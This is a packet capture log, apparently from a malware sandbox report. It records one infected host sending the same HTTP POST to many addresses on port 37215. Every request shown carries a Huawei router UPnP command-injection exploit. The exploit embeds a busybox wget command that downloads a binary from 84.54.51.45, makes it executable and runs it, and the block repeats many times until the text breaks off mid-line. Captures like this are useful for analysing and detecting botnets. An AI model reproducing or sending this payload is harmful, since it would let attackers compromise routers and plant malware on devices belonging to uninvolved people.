                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1183192.168.2.155506841.215.139.4837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175679922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1184192.168.2.154678441.181.155.21037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175704002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1185192.168.2.154003441.71.152.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175704002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1186192.168.2.155338441.222.91.11437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175729036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1187192.168.2.155333841.181.183.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175751925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1188192.168.2.153803041.146.145.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175782919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1189192.168.2.155197841.125.40.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175812960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1190192.168.2.156092241.146.198.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175868988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1191192.168.2.154766841.179.185.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175869942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1192192.168.2.154880441.58.138.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175889015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 